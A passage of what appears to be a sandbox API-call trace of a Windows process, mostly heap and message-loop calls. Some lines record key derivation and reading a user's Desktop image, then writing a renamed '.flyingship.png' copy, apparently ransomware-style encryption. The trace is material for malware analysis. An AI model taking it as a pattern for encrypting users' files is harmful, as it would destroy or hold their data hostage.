Size=0x40) returned 0x8db180 [0158.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0158.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0158.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0158.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0158.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0158.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0158.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0158.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0158.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0158.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0158.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.296] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.297] CryptDeriveKey (in: hProv=0x9c0c00, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0158.300] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.300] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0158.300] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.301] CryptDestroyHash (hHash=0x90af58) returned 1 [0158.301] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.301] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.301] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.301] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.301] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.301] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bQ9gmgo1CPU5L0JTf.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bq9gmgo1cpu5l0jtf.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0158.301] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.301] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0158.301] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.302] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.302] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.304] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bQ9gmgo1CPU5L0JTf.flyingship.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bq9gmgo1cpu5l0jtf.flyingship.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0158.311] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.311] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.311] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.311] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.311] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0158.311] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0xe652, lpOverlapped=0x0) returned 1 [0158.314] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0158.316] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.316] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.316] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.316] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0158.317] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.317] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.317] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0158.317] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0158.317] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0158.318] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0158.318] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0158.318] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.318] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0158.318] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.318] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c2748, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2748*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0158.318] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0158.318] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0158.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0158.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0158.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0158.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0158.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d4a0 [0158.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0158.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0158.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0158.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0158.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0158.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0158.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0158.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0158.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0158.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0158.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0158.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0158.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0158.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0158.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0158.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0158.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0158.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0158.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0158.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0158.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0158.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0158.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0158.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0158.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0158.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0158.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0158.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0158.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0158.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0158.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0158.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0158.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0158.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0158.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0158.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0158.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0158.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0158.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0158.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0158.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0158.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0158.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0158.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0158.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0158.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0158.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0158.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0158.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0158.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0158.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0158.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0158.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0158.322] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0158.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0158.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0158.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0158.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0158.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0158.322] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0158.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0158.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0158.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0158.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0158.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0158.323] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.323] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0158.323] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0158.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0158.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0158.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0158.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0158.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0158.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0158.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0158.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0158.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0158.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0158.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0158.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0158.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0158.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0158.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0158.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0158.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0158.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0158.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0158.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0158.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0158.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0158.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0158.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0158.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0158.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0158.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0158.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0158.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0158.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0158.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0158.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0158.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0158.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0158.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0158.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0158.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0158.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0158.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0158.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0158.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0158.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0158.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0158.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0158.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0158.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0158.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0158.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0158.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0158.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0158.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.326] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0158.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0158.326] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0158.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df050 | out: hHeap=0x8a0000) returned 1 [0158.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd798 [0158.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0158.326] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0158.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0158.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0158.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0158.326] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0158.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0158.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0158.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8a0 [0158.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0158.326] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0158.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0158.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0158.326] HeapFree (in: 